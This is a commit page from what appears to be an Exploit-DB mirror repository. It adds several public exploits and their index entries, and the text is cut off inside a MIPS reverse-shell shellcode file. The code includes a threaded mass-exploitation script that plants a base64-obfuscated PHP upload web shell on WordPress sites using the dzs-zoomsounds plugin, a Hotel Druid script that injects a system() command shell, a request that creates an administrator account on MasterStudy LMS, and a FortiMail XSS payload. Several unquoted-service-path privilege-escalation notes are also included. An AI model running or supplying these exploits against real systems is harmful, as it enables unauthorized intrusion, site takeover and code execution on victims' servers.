bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-02-19

Browse source 
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
This commit is contained in:
Offensive Security 2022-02-19 05:01:36 +00:00
parent a300bd948f
commit f2d7e05ad0
19 changed files with 775 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/multiple/webapps/50759.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/fmlurlsvc/
# Date: 01-Feb-2022
# Exploit Author: Braiant Giraldo Villa
# Contact: @iron_fortress (Twitter)
# Vendor Homepage: https://www.fortinet.com/products/email-security
# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
# Version:
# FortiMail version 7.0.1 and below
# FortiMail version 6.4.5 and below
# FortiMail version 6.2.7 and below
# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
1. Description:
An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. Proof of Concept:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
4. References
https://www.fortiguard.com/psirt/FG-IR-21-185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062

21
exploits/php/webapps/50752.txt Normal file
View file

@ -0,0 +1,21 @@
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

111
exploits/php/webapps/50753.py Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()

144
exploits/php/webapps/50754.py Executable file
View file

@ -0,0 +1,144 @@
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#!/usr/bin/python3
import requests
import argparse
def login( target , username = "" , password = "", noauth=False):
login_data = {
"vers_hinc" : "1",
"nome_utente_phpr" : username,
"password_phpr" : password
}
if not noauth:
login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
ret_data = {"token" : token , "anno" : anno}
#print("ret data" + ret_data)
return ret_data
else:
return False
else:
login_req = requests.get(f"{target}/inizio.php" , verify=False )
try:
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
token = ""
ret_data = {"token" : token , "anno" : anno}
return ret_data
except:
return False
def check_privilege(target , anno , token=""):
priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
#print(priv_req.text)
if "Modify" in priv_req.text:
return True
else:
return False
def add_room(target , anno , token=""):
add_room_data = {
"anno": anno,
"id_sessione": token,
"n_app":"{${system($_REQUEST['cmd'])}}",
"crea_app":"SI",
"crea_letti":"",
"n_letti":"",
"tipo_tabella":"appartamenti"
}
add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
#print(add_req.text)
if "has been added" in add_req.text:
return True
else:
return False
def test_code_execution(target):
code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
if "uid=" in code_execution_req.text:
return code_execution_req.text.split("\n")[0]
else:
return False
def main():
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
parser = argparse.ArgumentParser()
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
req_args.add_argument("-u" , "--username" , help="Username" , required=False)
req_args.add_argument("-p" , "--password" , help="password", required=False)
req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
args = parser.parse_args()
target = args.target
if target[-1] == "/":
target = target[:-1]
noauth = args.noauth
username = args.username
password = args.password
if noauth == False and (username == None or password == None):
print('[-] Please provide the authentication method.' )
quit()
print(banner)
if not noauth:
print(f"[*] Logging in with the credential {username}:{password}")
login_result = login(username = username , password = password , target = target)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print("[-] Login failed, Check your credential or check if login is required or not .")
quit()
else:
print('[*] Trying to access the Dashboard.')
login_result = login(username = username , password = password , target = target , noauth=True)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
exit()
print("[*] Checking the privilege of the user.")
if check_privilege(target= target , token=token , anno=anno):
print("[+] User has the privilege to add room.")
else:
print("[-] User doesn't have the privilege to add room.")
exit()
print("[*] Adding a new room.")
if add_room(target = target , anno=anno , token=token):
print('[+] Room has been added successfully.')
else:
print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
exit()
print('[*] Testing code exection')
output = test_code_execution(target = target)
if output != False:
print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
print(f"[+] Example Output : {output}")
exit()
else:
print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
exit()
main()

35
exploits/windows/local/50755.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 11.4.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto
# Service info:
C:\>sc qc DFWSIDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DFWSIDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare WSID help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

35
exploits/windows/local/50756.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
# Tested Version: 3.5.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto
# Service info:
C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

35
exploits/windows/local/50757.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
# Tested Version: 1.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """
FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto
# Service info:
C:\>sc qc FSService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FSService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

35
exploits/windows/local/50758.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/ubackit_full8767.exe
# Tested Version: 2.0.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """
Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto
# Service info:
C:\>sc qc wsbackup
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wsbackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare wsbackup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

23
exploits/windows/local/50760.txt Normal file
View file

@ -0,0 +1,23 @@
#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : TOSHIBA
#Version : TOSHIBA Navi Support Service 1.00.0000
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\Users\Administrador>sc qc TNaviSrv
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: TNaviSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD
PLAYER\TNaviSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : TOSHIBA Navi Support Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

25
exploits/windows/local/50761.txt Normal file
View file

@ -0,0 +1,25 @@
#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
#Exploit Date: 2022-02-17
#Vendor : IVT Corp
#Version : BlueSoleilCS 5.4.277
#Vendor Homepage : www.ivtcorporation.com
#Tested on OS: Windows 7 Pro
#This software installs EDTService.exe version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc BlueSoleilCS
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: BlueSoleilCS
TIPO : 120 WIN32_SHARE_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IVT
Corporation\BlueSoleil\BlueSoleilCS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : BlueSoleilCS
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

26
exploits/windows/local/50762.txt Normal file
View file

@ -0,0 +1,26 @@
#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Intel
#Version : Intel(R) Management Engine Components 6.0.0.1189
#Vendor Homepage : https://www.intel.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc LMS
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: LMS
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)
Management Engine Components\LMS\LMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Management and Security Application
Local Management Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

25
exploits/windows/local/50763.txt Normal file
View file

@ -0,0 +1,25 @@
#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-14
#Vendor : Hewlett-Packard(HP)
#Version : File Sanitizer for HP ProtectTools 5.0.1.3
#Vendor Homepage : http://www.hp.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc HPFSService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: HPFSService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File
Sanitizer\HPFSService.exe
GRUPO_ORDEN_CARGA : File System
ETIQUETA : 0
NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

27
exploits/windows/local/50764.txt Normal file
View file

@ -0,0 +1,27 @@
#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Connectify Inc
#Version : Connectify Hotspot 2018
#Vendor Homepage : https://www.connectify.me/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc Connectify
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Connectify
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Connectify\ConnectifyService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Connectify Hotspot 2018
DEPENDENCIAS : wlansvc
: winmgmt
: http
NOMBRE_INICIO_SERVICIO: LocalSystem

13
files_exploits.csv
View file

@ -11441,6 +11441,15 @@ id,file,description,date,author,type,platform,port
50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows,
50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50758,exploits/windows/local/50758.txt,"Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50760,exploits/windows/local/50760.txt,"TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50761,exploits/windows/local/50761.txt,"Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50762,exploits/windows/local/50762.txt,"Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44821,3 +44830,7 @@ id,file,description,date,author,type,platform,port
50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple,
50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",1970-01-01,"numan türle",webapps,php,
50753,exploits/php/webapps/50753.py,"WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Overthinker1877,webapps,php,
50754,exploits/php/webapps/50754.py,"Hotel Druid 3.0.3 - Remote Code Execution (RCE)",1970-01-01,0z09e,webapps,php,
50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Braiant Giraldo Villa",webapps,multiple,

Can't render this file because it is too large.

4
files_shellcodes.csv
View file

@ -1046,3 +1046,7 @@ id,file,description,date,author,type,platform
50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86
50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
50722,shellcodes/windows_x86/50722.asm,"Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
50748,shellcodes/solaris_sparc/50748.c,"Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50749,shellcodes/solaris_sparc/50749.c,"Solaris/SPARC - chmod(./me) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50750,shellcodes/solaris_sparc/50750.c,"Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",1970-01-01,"Marco Ivaldi",shellcode,linux_mips

1 id file description date author type platform
1046 50710 shellcodes/windows_x86/50710.asm Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes) 1970-01-01 Techryptic shellcode windows_x86
1047 50711 shellcodes/windows_x86/50711.asm Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes) 1970-01-01 Tarek Ahmed shellcode windows_x86
1048 50722 shellcodes/windows_x86/50722.asm Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes) 1970-01-01 Tarek Ahmed shellcode windows_x86
1049 50748 shellcodes/solaris_sparc/50748.c Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1050 50749 shellcodes/solaris_sparc/50749.c Solaris/SPARC - chmod(./me) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1051 50750 shellcodes/solaris_sparc/50750.c Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode 1970-01-01 Marco Ivaldi shellcode solaris_sparc
1052 50751 shellcodes/linux_mips/50751.c Linux/MIPS - N32 MSB Reverse Shell Shellcode 1970-01-01 Marco Ivaldi shellcode linux_mips

90
shellcodes/linux_mips/50751.c Normal file
View file

@ -0,0 +1,90 @@
/*
* mips_n32_msb_linux_revsh.c - MIPS N32 MSB Linux reverse
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Basic MIPS N32 MSB Linux reverse shellcode, showcasing various
* techniques to avoid badchars.
*
* Cross-compile (https://buildroot.org/) with:
* $ mips64-linux-gcc -static mips_n32_msb_linux_revsh.c -o revsh
*
* Tested on Linux MIPS64 Cavium Octeon III. I placed the shellcode on the
